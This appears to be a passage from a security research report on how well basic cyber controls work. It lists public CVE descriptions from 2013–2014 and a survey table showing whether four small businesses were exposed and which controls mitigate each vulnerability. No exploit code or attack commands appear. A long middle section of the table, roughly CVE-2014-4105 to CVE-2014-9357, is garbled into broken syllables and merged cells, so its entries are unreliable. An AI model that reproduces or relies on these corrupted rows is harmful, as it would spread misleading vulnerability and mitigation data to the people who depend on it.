CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability".

CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability".

CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability".

CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability".

CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2773.

CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.


CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability".

CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4137.

CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.

CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability".

CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.


Survey Responses



Cyber Controls Applicability

CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management
CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall Anti DOS
CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall Anti DOS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall Anti DOS, Patch Management
CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall Anti-Dos, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-41

14

yy

yy

nN

ot

Mit

igat

edM

itig

ated

-A

nti

-Mal

war

eC

VE

-20

14

-41

27

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-4

13

0y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-41

32

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-4

13

3y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

t

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28

CV

ES

ME

1S

ME

2S

ME

3S

ME

4Id

ealis

edN

oC

EW

ith

CE

CV

E-2

01

4-4

14

1y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-44

81

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

An

ti-M

alw

are

CV

E-2

01

4-4

61

7y

yn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

4-4

63

1n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

CV

E-2

01

4-6

04

0n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-6

10

5n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

4-6

13

6n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

4-6

36

3y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-63

69

yn

yy

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-63

78

nn

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

4-6

48

7n

ny

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-7

25

0n

yy

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

4-7

92

7y

yy

yn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(A

cces

sC

on

tro

l)

Pat

chM

anag

emen

tC

VE

-20

14

-79

45

yy

yy

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

14

-84

47

yy

yy

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

An

ti-M

alw

are

Pat

chM

anag

emen

tC

VE

-20

14

-86

38

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-8

83

5y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-9

15

9y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-A

nti

-Mal

war

eP

atch

Man

agem

ent

[Tim

eD

elay

]C

VE

-20

14

-91

63

yy

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

An

ti-M

alw

are

Pat

chM

anag

emen

t[T

ime

Del

ay]

CV

E-2

01

4-9

35

0y

yy

yn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lA

nti

-Do

sF

irm

war

eU

pd

ates

CV

E-2

01

4-9

35

7n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

An

ti-M

alw

are

Sec

ure

Co

nfi

gu

rati

on

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28

CVE | Details

CVE-2013-0008 | win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability".

CVE-2013-0022 | Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability".

CVE-2013-0084 | Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability".

CVE-2013-0140 | SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149 | The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172 | Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174 | The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199 | The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253 | The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270 | OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481 | The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598 | Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619 | Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633 | Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649 | Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

